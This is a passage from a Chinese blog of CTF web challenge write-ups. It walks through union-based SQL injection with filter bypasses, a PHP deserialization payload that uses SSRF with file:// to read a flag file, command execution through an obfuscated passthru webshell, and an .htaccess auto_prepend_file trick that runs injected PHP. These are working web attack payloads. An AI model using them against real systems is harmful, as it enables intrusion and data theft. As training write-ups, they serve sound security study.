    <span class="token variable">$str_show</span> <span class="token operator">=</span> <span class="token function">substr</span><span class="token punctuation">(</span><span class="token variable">$str</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">10</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$str_show</span> <span class="token operator">==</span> <span class="token string double-quoted-string">"OFsCrW9SFj"</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token variable">$str</span><span class="token punctuation">;</span>
        <span class="token keyword">break</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<hr>
<h1 id="FSCTF-2023-源码！启动"><a href="#FSCTF-2023-源码！启动" class="headerlink" title="[FSCTF 2023]源码！启动!"></a>[FSCTF 2023]源码！启动!</h1><p>禁用了f12，ctrl+u即可查看页面源码找到flag</p>
<hr>
<h1 id="NSSCTF-2022-Spring-Recruit-babysql"><a href="#NSSCTF-2022-Spring-Recruit-babysql" class="headerlink" title="[NSSCTF 2022 Spring Recruit]babysql"></a>[NSSCTF 2022 Spring Recruit]babysql</h1><blockquote>
<p>sql联合注入</p>
</blockquote>
<p>注入点在post请求的username参数上</p>
<p>尝试万能密码1’or 1&#x3D;1，返回黑名单<code>/if|and|\s|#|--/i</code>，这里的<code>\s</code>是指过滤了空格，可以用<code>/**/</code>代替</p>
<p>然后这里过滤了注释符，只能我们自己手动闭合语句了</p>
<p>联合注入查数据库</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span><span class="token string">'/**/union/**/select/**/database()'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>得到数据库名test</p>
<p>查表</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span><span class="token string">'/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="test"'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>得到表名flag,users</p>
<p>查列名</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span><span class="token string">'/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name="flag"'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>得到列名flag</p>
<p>查字段</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql"><span class="token number">1</span><span class="token string">'/**/union/**/select/**/(select/**/group_concat(flag)/**/from/**/flag)/**/'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>得到flag</p>
<hr>
<h1 id="网鼎杯-2018-Fakebook"><a href="#网鼎杯-2018-Fakebook" class="headerlink" title="[网鼎杯 2018]Fakebook"></a>[网鼎杯 2018]Fakebook</h1><blockquote>
<p>反序列化+sql注入+ssrf</p>
</blockquote>
<p>进入题目，有一个login登录功能和一个join注册功能</p>
<p>dirsearch扫一下，发现存在robots.txt，flag在flag.php</p>
<p>访问得到hint：&#x2F;user.php.bak备份文件泄露</p>
<p>访问&#x2F;user.php.bak，得到user.php源码</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">UserInfo</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$name</span> <span class="token operator">=</span> <span class="token string double-quoted-string">""</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$age</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$blog</span> <span class="token operator">=</span> <span class="token string double-quoted-string">""</span><span class="token punctuation">;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">__construct</span><span class="token punctuation">(</span><span class="token variable">$name</span><span class="token punctuation">,</span> <span class="token variable">$age</span><span class="token punctuation">,</span> <span class="token variable">$blog</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">name</span> <span class="token operator">=</span> <span class="token variable">$name</span><span class="token punctuation">;</span>
        <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">age</span> <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword type-casting">int</span><span class="token punctuation">)</span><span class="token variable">$age</span><span class="token punctuation">;</span>
        <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">blog</span> <span class="token operator">=</span> <span class="token variable">$blog</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token keyword">function</span> <span class="token function-definition function">get</span><span class="token punctuation">(</span><span class="token variable">$url</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token variable">$ch</span> <span class="token operator">=</span> <span class="token function">curl_init</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        <span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_URL</span><span class="token punctuation">,</span> <span class="token variable">$url</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token function">curl_setopt</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLOPT_RETURNTRANSFER</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$output</span> <span class="token operator">=</span> <span class="token function">curl_exec</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token variable">$httpCode</span> <span class="token operator">=</span> <span class="token function">curl_getinfo</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">,</span> <span class="token constant">CURLINFO_HTTP_CODE</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token variable">$httpCode</span> <span class="token operator">==</span> <span class="token number">404</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
            <span class="token keyword">return</span> <span class="token number">404</span><span class="token punctuation">;</span>
        <span class="token punctuation">&#125;</span>
        <span class="token function">curl_close</span><span class="token punctuation">(</span><span class="token variable">$ch</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        <span class="token keyword">return</span> <span class="token variable">$output</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">getBlogContents</span> <span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token keyword">return</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token function">get</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-></span><span class="token property">blog</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function-definition function">isValidBlog</span> <span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">&#123;</span>
        <span class="token variable">$blog</span> <span class="token operator">=</span> <span class="token variable">$this</span><span class="token operator">-></span><span class="token property">blog</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> <span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]&#123;2,6&#125;(\:[0-9]+)?(\/\S*)?$/i"</span><span class="token punctuation">,</span> <span class="token variable">$blog</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>稍微审计一下就可以发现这是一个存在ssrf的类，在join功能处被调用</p>
<p>正则匹配的是一个<code>http://</code>或<code>https://</code>开头的url</p>
<p>我们先随便注册一个账号，然后点击username跳转到view.php，发现多了个参数?no&#x3D;1</p>
<p>测试发现存在数字型注入而且会回显</p>
<p><img src="/blog/2023/11/03/NSSCTF-web-%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%952/image-20231107124000950.png" alt="image-20231107124000950"></p>
<p>然后测试字段数</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">?<span class="token keyword">no</span><span class="token operator">=</span><span class="token number">1</span> <span class="token keyword">order</span> <span class="token keyword">by</span> <span class="token number">5</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/blog/2023/11/03/NSSCTF-web-%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%952/image-20231107124138542.png" alt="image-20231107124138542"></p>
<p>可知字段数为4</p>
<p>尝试联合注入</p>
<p>测试发现<code>union select</code>用不了，猜测是整个被ban了，可以用<code>union/**/select</code>代替</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">?<span class="token keyword">no</span><span class="token operator">=</span><span class="token number">0</span> <span class="token keyword">union</span><span class="token comment">/**/</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="/blog/2023/11/03/NSSCTF-web-%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%952/image-20231107124617673.png" alt="image-20231107124617673"></p>
<p>发现显示位在第二位，即username回显的</p>
<p>查表</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">?<span class="token keyword">no</span><span class="token operator">=</span><span class="token number">0</span> <span class="token keyword">union</span><span class="token comment">/**/</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span>group_concat<span class="token punctuation">(</span>table_name<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span> <span class="token keyword">from</span> information_schema<span class="token punctuation">.</span><span class="token keyword">tables</span> <span class="token keyword">where</span> table_schema<span class="token operator">=</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>得到users表</p>
<p>查列名</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">?<span class="token keyword">no</span><span class="token operator">=</span><span class="token number">0</span> <span class="token keyword">union</span><span class="token comment">/**/</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span>group_concat<span class="token punctuation">(</span>column_name<span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span> <span class="token keyword">from</span> information_schema<span class="token punctuation">.</span><span class="token keyword">columns</span> <span class="token keyword">where</span> table_schema<span class="token operator">=</span><span class="token keyword">database</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token operator">and</span> table_name<span class="token operator">=</span><span class="token string">'users'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>得到no,username,passwd,data</p>
<p>查看data</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">?<span class="token keyword">no</span><span class="token operator">=</span><span class="token number">0</span> <span class="token keyword">union</span><span class="token comment">/**/</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span>group_concat<span class="token punctuation">(</span><span class="token keyword">data</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token number">4</span> <span class="token keyword">from</span> users<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>返回一个序列化字符串</p>
<p><img src="/blog/2023/11/03/NSSCTF-web-%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%952/image-20231107125011095.png" alt="image-20231107125011095"></p>
<p>注意后面的报错Trying to get property of non-object（正在尝试获取非对象的属性），意思就是要我们传入对象</p>
<p>而一开始我们就知道flag在flag.php，那么应该就是要我们利用反序列化中的ssrf来读取flag</p>
<p>所以这里直接用file协议读取flag.php</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">class</span> <span class="token class-name-definition class-name">UserInfo</span>
<span class="token punctuation">&#123;</span>
    <span class="token keyword">public</span> <span class="token variable">$name</span> <span class="token operator">=</span> <span class="token string double-quoted-string">""</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$age</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
    <span class="token keyword">public</span> <span class="token variable">$blog</span> <span class="token operator">=</span> <span class="token string double-quoted-string">"file:///var/www/html/flag.php"</span><span class="token punctuation">;</span>

<span class="token punctuation">&#125;</span>
<span class="token keyword">echo</span> <span class="token function">serialize</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">UserInfo</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>得到</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token constant">O</span><span class="token punctuation">:</span><span class="token number">8</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"UserInfo"</span><span class="token punctuation">:</span><span class="token number">3</span><span class="token punctuation">:</span><span class="token punctuation">&#123;</span>s<span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"name"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">0</span><span class="token punctuation">:</span><span class="token string double-quoted-string">""</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">3</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"age"</span><span class="token punctuation">;</span>i<span class="token punctuation">:</span><span class="token number">0</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"blog"</span><span class="token punctuation">;</span>s<span class="token punctuation">:</span><span class="token number">29</span><span class="token punctuation">:</span><span class="token string double-quoted-string">"file:///var/www/html/flag.php"</span><span class="token punctuation">;</span><span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>这里注意一下逻辑顺序，这里会先进行sql查询然后再进行反序列化，所以我们要把序列化字符串放在注入的字段里</p>
<p>payload：</p>
<pre class="line-numbers language-sql" data-language="sql"><code class="language-sql">?<span class="token keyword">no</span><span class="token operator">=</span><span class="token number">0</span> <span class="token keyword">union</span><span class="token comment">/**/</span><span class="token keyword">select</span> <span class="token number">1</span><span class="token punctuation">,</span><span class="token number">2</span><span class="token punctuation">,</span><span class="token number">3</span><span class="token punctuation">,</span><span class="token string">'O:8:"UserInfo":3:&#123;s:4:"name";s:0:"";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";&#125;'</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>回显的位置是在最底下的ssrf窗口，这里要ctrl+u来查看</p>
<pre class="line-numbers language-markup" data-language="markup"><code class="language-markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>iframe</span> <span class="token attr-name">width</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>100%<span class="token punctuation">'</span></span> <span class="token attr-name">height</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>10em<span class="token punctuation">'</span></span> <span class="token attr-name">src</span><span class="token attr-value"><span class="token punctuation attr-equals">=</span><span class="token punctuation">'</span>data:text/html;base64,PD9waHANCg0KJGZsYWcgPSAiTlNTQ1RGezMwMDRjZmFlLTRjNDYtNDkzMS05YTMxLWM0NDc4MmIzNzhjYX0iOw0KZXhpdCgwKTsNCg==<span class="token punctuation">'</span></span><span class="token punctuation">></span></span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>base64解码得到flag</p>
<hr>
<h1 id="FSCTF-2023-webshell是啥捏"><a href="#FSCTF-2023-webshell是啥捏" class="headerlink" title="[FSCTF 2023]webshell是啥捏"></a>[FSCTF 2023]webshell是啥捏</h1><p>进入题目，看到源码</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
$😀<span class="token operator">=</span><span class="token string double-quoted-string">"a"</span><span class="token punctuation">;</span>
$😁<span class="token operator">=</span><span class="token string double-quoted-string">"b"</span><span class="token punctuation">;</span>
$😂<span class="token operator">=</span><span class="token string double-quoted-string">"c"</span><span class="token punctuation">;</span>
$🤣<span class="token operator">=</span><span class="token string double-quoted-string">"d"</span><span class="token punctuation">;</span>
$😃<span class="token operator">=</span><span class="token string double-quoted-string">"e"</span><span class="token punctuation">;</span>
$😄<span class="token operator">=</span><span class="token string double-quoted-string">"f"</span><span class="token punctuation">;</span>
$😅<span class="token operator">=</span><span class="token string double-quoted-string">"g"</span><span class="token punctuation">;</span>
$😆<span class="token operator">=</span><span class="token string double-quoted-string">"h"</span><span class="token punctuation">;</span>
$😉<span class="token operator">=</span><span class="token string double-quoted-string">"i"</span><span class="token punctuation">;</span>
$😊<span class="token operator">=</span><span class="token string double-quoted-string">"j"</span><span class="token punctuation">;</span>
$😋<span class="token operator">=</span><span class="token string double-quoted-string">"k"</span><span class="token punctuation">;</span>
$😎<span class="token operator">=</span><span class="token string double-quoted-string">"l"</span><span class="token punctuation">;</span>
$😍<span class="token operator">=</span><span class="token string double-quoted-string">"m"</span><span class="token punctuation">;</span>
$😘<span class="token operator">=</span><span class="token string double-quoted-string">"n"</span><span class="token punctuation">;</span>
$😗<span class="token operator">=</span><span class="token string double-quoted-string">"o"</span><span class="token punctuation">;</span>
$😙<span class="token operator">=</span><span class="token string double-quoted-string">"p"</span><span class="token punctuation">;</span>
$😚<span class="token operator">=</span><span class="token string double-quoted-string">"q"</span><span class="token punctuation">;</span>
$🙂<span class="token operator">=</span><span class="token string double-quoted-string">"r"</span><span class="token punctuation">;</span>
$🤗<span class="token operator">=</span><span class="token string double-quoted-string">"s"</span><span class="token punctuation">;</span>
$🤩<span class="token operator">=</span><span class="token string double-quoted-string">"t"</span><span class="token punctuation">;</span>
$🤔<span class="token operator">=</span><span class="token string double-quoted-string">"u"</span><span class="token punctuation">;</span>
$🤨<span class="token operator">=</span><span class="token string double-quoted-string">"v"</span><span class="token punctuation">;</span>
$😐<span class="token operator">=</span><span class="token string double-quoted-string">"w"</span><span class="token punctuation">;</span>
$😑<span class="token operator">=</span><span class="token string double-quoted-string">"x"</span><span class="token punctuation">;</span>
$😶<span class="token operator">=</span><span class="token string double-quoted-string">"y"</span><span class="token punctuation">;</span>
$🙄<span class="token operator">=</span><span class="token string double-quoted-string">"z"</span><span class="token punctuation">;</span>
$😭 <span class="token operator">=</span> $😙<span class="token operator">.</span> $😀<span class="token operator">.</span> $🤗<span class="token operator">.</span> $🤗<span class="token operator">.</span> $🤩<span class="token operator">.</span> $😆<span class="token operator">.</span> $🙂<span class="token operator">.</span> $🤔<span class="token punctuation">;</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'👽'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">eval</span><span class="token punctuation">(</span>$😭<span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'👽'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span> <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>挺抽象（</p>
<p>但是对应一下就可以发现底下的<code>$😭</code>部分拼接起来是<code>passthru</code></p>
<p>那么直接命令执行即可</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token operator">?</span>👽<span class="token operator">=</span>ls <span class="token operator">/</span><span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<hr>
<h1 id="羊城杯-2020-easyphp"><a href="#羊城杯-2020-easyphp" class="headerlink" title="[羊城杯 2020]easyphp"></a>[羊城杯 2020]easyphp</h1><blockquote>
<p>.htaccess文件上传</p>
</blockquote>
<p>源码</p>
<pre class="line-numbers language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
    <span class="token variable">$files</span> <span class="token operator">=</span> <span class="token function">scandir</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'./'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token keyword">foreach</span><span class="token punctuation">(</span><span class="token variable">$files</span> <span class="token keyword">as</span> <span class="token variable">$file</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">is_file</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$file</span> <span class="token operator">!==</span> <span class="token string double-quoted-string">"index.php"</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                <span class="token function">unlink</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token operator">!</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'content'</span><span class="token punctuation">]</span><span class="token punctuation">)</span> <span class="token operator">||</span> <span class="token operator">!</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'filename'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token variable">$content</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'content'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">stristr</span><span class="token punctuation">(</span><span class="token variable">$content</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'on'</span><span class="token punctuation">)</span> <span class="token operator">||</span> <span class="token class-name">stristr</span><span class="token punctuation">(</span><span class="token variable">$content</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'html'</span><span class="token punctuation">)</span> <span class="token operator">||</span> <span class="token class-name">stristr</span><span class="token punctuation">(</span><span class="token variable">$content</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'type'</span><span class="token punctuation">)</span> <span class="token operator">||</span> <span class="token class-name">stristr</span><span class="token punctuation">(</span><span class="token variable">$content</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'flag'</span><span class="token punctuation">)</span> <span class="token operator">||</span> <span class="token class-name">stristr</span><span class="token punctuation">(</span><span class="token variable">$content</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'upload'</span><span class="token punctuation">)</span> <span class="token operator">||</span> <span class="token class-name">stristr</span><span class="token punctuation">(</span><span class="token variable">$content</span><span class="token punctuation">,</span><span class="token string single-quoted-string">'file'</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token string double-quoted-string">"Hacker"</span><span class="token punctuation">;</span>
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token variable">$filename</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'filename'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
    <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"/[^a-z\.]/"</span><span class="token punctuation">,</span> <span class="token variable">$filename</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token number">1</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">echo</span> <span class="token string double-quoted-string">"Hacker"</span><span class="token punctuation">;</span>
        <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token variable">$files</span> <span class="token operator">=</span> <span class="token function">scandir</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'./'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
    <span class="token keyword">foreach</span><span class="token punctuation">(</span><span class="token variable">$files</span> <span class="token keyword">as</span> <span class="token variable">$file</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">if</span><span class="token punctuation">(</span><span class="token function">is_file</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">&#123;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$file</span> <span class="token operator">!==</span> <span class="token string double-quoted-string">"index.php"</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
                <span class="token function">unlink</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">&#125;</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
    <span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token variable">$filename</span><span class="token punctuation">,</span> <span class="token variable">$content</span> <span class="token operator">.</span> <span class="token string double-quoted-string">"\nHello, world"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span> <span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>具体意思就是get传入文件名字和文件内容，文件内容的末尾会换行并追加一句Hello, world</p>
<p>然后文件内容过滤了<code>on</code>，<code>html</code>，<code>type</code>，<code>flag</code>，<code>upload</code>，<code>file</code></p>
<p>文件名必须只有小写字母或者<code>.</code></p>
<p>而且每次运行开始都会删除当前目录中除了index.php以外所有的文件</p>
<p>尝试直接传马，但是并没有被解析为php</p>
<p>那么思路很明显，要传配置文件在index.php处上马</p>
<p>我们知道.user.ini的文件上传中有<code>auto_prepend_file</code>这类可以进行文件包含的配置，但是这里我们每次执行后当前目录最多存在index.php和我们刚刚上传的文件，所以这里用不了.user.ini</p>
<p>不过.htaccess文件也可以用<code>php_value</code>对php的配置进行修改来起到与.user.ini一样的效果</p>
<pre class="line-numbers language-htaccess" data-language="htaccess"><code class="language-htaccess">php_value auto_prepend_file &lt;filename&gt;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>因为只会存在index.php和.htaccess，所以我们这里的配置就是设置为包含自己<code>php_value auto_prepend_file .htaccess</code></p>
<p>然后在htaccess中，<code>#</code>是注释符的作用，但是包含到php执行时，写在注释里的一句话木马也会被执行</p>
<p>最后由于末行会新增一句Hello, world，我们需要用<code>\</code>来把<code>\n</code>转义为<code>\\</code>和<code>n</code></p>
<p>所以我们的.htaccess文件如下：</p>
<pre class="line-numbers language-htaccess" data-language="htaccess"><code class="language-htaccess">php_value auto_prepend_file &quot;.htaccess&quot;
#&lt;?php phpinfo();?&gt;
#\<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>

<p>payload：</p>
<p>这里由于把file过滤了，我们用反斜杠<code>fi\le</code>绕过即可</p>
<p>注：注意编码，配置文件传错了的话很容易返回500，建议重开</p>
